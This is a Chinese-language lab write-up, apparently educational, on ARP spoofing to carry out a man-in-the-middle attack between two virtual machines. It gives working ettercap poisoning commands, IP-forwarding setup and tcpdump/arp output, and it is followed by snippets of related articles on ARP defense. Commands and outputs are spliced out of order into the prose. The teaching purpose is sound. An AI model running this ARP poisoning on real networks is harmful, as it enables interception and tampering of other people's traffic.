在本實驗中,針對arp協議無驗證缺陷,進行arp欺騙以實施中間人攻擊,通過實驗實現
根據提供的實驗環境,owasp節點和seedubuntu節點之間正常通行時資料報將不會經過kali節點。攻擊節點kali將通過arp欺騙成文中間人,從而截獲seedubuntu和owasp節點之間的資料報,並可對資料報內容進行篡改。
seedubuntu和owasp節點的網路配置只需在虛擬機器的設定選單中更改網路連線方式為nat即可。
實驗中的虛擬機器
arp欺騙攻擊的根源在於arp協議在設計時認為區域網內部的所有使用者都是可信的,當攻擊者滲透進入內網後, 通過向區域網內節點快取中注入偽造的ip/mac對映關係,從而進行欺騙,成為區域網內的中間人節點,即可以監聽並進一步篡改資料報。
注:這裡的ip是測試環境的ip,自己做實驗時需要替換成實驗環境中的ip
1.seed ubuntu節點與owasp節點正常通行
在seedubuntu節點下,利用瀏覽器訪問owasp的web服務如下圖所示:
2.kali節點進行arp欺騙攻擊
1) 檢視攻擊前arp快取表
在實施攻擊前,在seedubuntu和owasp分別輸入arp命令,確認arp快取狀態,如下所示:
root@ubuntu:~# arp -a2) 利用netwox進行中間人欺騙攻擊,即同時傳送偽造的arp響應報文到seed ubuntu和owasp節點? (192.168.200.2) at 00:50:56:fc:e8:4b [ether] on eth0
? (192.168.200.125) at 00:0c:29:41:23:0e [ether] on eth0
root@kali:~# ettercap -tqi eth0 -m arp:remote /192.168.200.125// /192.168.200.124//3) 開啟kali節點的ip**功能:2 hosts added to the hosts list...
arp poisoning victims:
group 1 : 192.168.200.125 00:0c:29:41:23:0e
group 2 : 192.168.200.124 00:0c:29:2c:c0:07
starting unified sniffing...
root@kali:~# cat /proc/sys/net/ipv4/ip_forward4) 分析arp欺騙攻擊資料報0root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
在seed ubuntu或owasp節點下,執行tcpdump命令,檢視arp資料報,如下所示:
root@ubuntu:/home/seed# tcpdump -i eth0 arp -n可以看到,192.168.200.124和192.168.200.125的mac對映位址全被設定為kali節點的mac位址tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type en10mb (ethernet), capture size 65535 bytes
04:34:33.690429 arp, reply 192.168.200.124 is-at 00:0c:29:da:ee:f6, length 46
04:34:33.690445 arp, reply 192.168.200.125 is-at 00:0c:29:da:ee:f6, length 46
00:0c:29:da:ee:f6
,此時再執行arp命令檢視arp快取,如下所示:
root@ubuntu:/home/seed# arp -a3.中間人資料分析? (192.168.200.2) at 00:50:56:fc:e8:4b [ether] on eth0
? (192.168.200.125) at 00:0c:29:da:ee:f6 [ether] on eth0
在seedubuntu節點下,再次利用瀏覽器訪問owasp的web服務同時在kali節點下開啟wireshark, 可以看到seedubuntu和owasp間的資料報經由kali節點進行**:
wireshark 要進行ip過濾:!tcp.port==3389
ARP協議 ARP攻擊與防禦
目錄 arp協議 1 arp協議概述 2 arp協議作用 3 arp協議原理 1 傳送arp廣播請求 2 接受arp單播應答 4 arp的工作過程 5 arp 6 arp攻擊或欺騙的原理是 1 arp協議沒有驗證機制,所以容易被arp偷渡攻擊 2 arp攻擊者通過傳送虛假偽造的arp報文對受害者進行...
ARP欺騙攻擊原理及其防禦
一 概述 通訊方式 2 arp欺騙 利用arp協議的缺陷進行的一種非法攻擊 二 arp欺騙攻擊原理 1 原理 主機接收到乙個應答包之後,並不會驗證自己是否傳送過對應的arp請求包,也不會驗證這個arp請求包是否可信,而是直接用應答包裡的ip位址和mac位址的對應關係替換掉arp快取表裡原有的對應關係...
ARP 協議詳解與 ARP 欺騙
arp 協議作為 tcp ip 中的重要基礎協議之一,不僅是所有 it 人員必須明白的知識點,更是每個普通人都應當了解的技術。只有完全理解了 arp 協議的作用,才能更好地理解網際網路的運作,更好地對抗 arp 欺騙,保護系統和家人的安全。本場 chat 會包含關於 arp 協議的理論知識和簡單的 ...